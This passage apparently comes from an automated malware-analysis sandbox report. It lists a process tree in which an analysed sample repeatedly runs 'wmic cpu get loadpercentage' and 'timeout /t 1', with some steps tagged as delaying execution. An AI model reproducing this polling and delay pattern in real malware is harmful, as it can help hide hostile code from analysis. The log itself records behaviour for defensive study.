    3⤵
    PID:4260
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2080
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4420
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3472
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1976
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3480
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1720
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3888
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2744
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4368
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2308
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1716
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3516
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4148
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2044
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4460
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1600
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:748
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3068
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4648
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2580
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4192
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2068
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4724
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3096
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4628
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2260
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4436
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2232
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1028
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4176
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1364
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1604
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3676
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1112
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:368
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4608
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:200
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2880
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1332
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:744
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2124
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1932
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2280
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4536
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1696
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4432
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2524
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1448
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2192
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4920
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2716
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1880
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5112
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3068
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4188
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3644
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2068
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2636
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3496
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4708
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4036
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1608
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1892
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:656
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4576
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2236
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4384
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:920
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4136
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4068
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3828
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4912
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4668
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1864
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2176
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1216
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2456
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4516
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4976
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4664
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1716
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2424
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4892
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3360
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4272
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4460
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:404
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:416
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5112
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4648
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3684
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4584
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4088
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1288
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4716
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:596
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3456
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2148
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4360
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4740
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2236
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4992
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2904
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1228
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1236
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2144
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4940
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:352
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3352
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3976
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3328
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4660
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3260
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4068
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4912
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4540
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1976
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4424
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3136
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4700
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4264
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1696
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4448
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3024
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4728
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:316
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4212
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4240
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1008
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1168
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:404
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4228
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:512
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3540
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5108
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4724
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1368
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:96
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1304
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4412
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4816
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2648
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:432
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3176
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2668
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2820
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4740
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1048
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4144
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4292
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2924
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1928
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4408
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2696
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:352
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3572
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3976
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3676
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4660
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:212
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4068
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4056
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4668
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1864
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3136
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3888
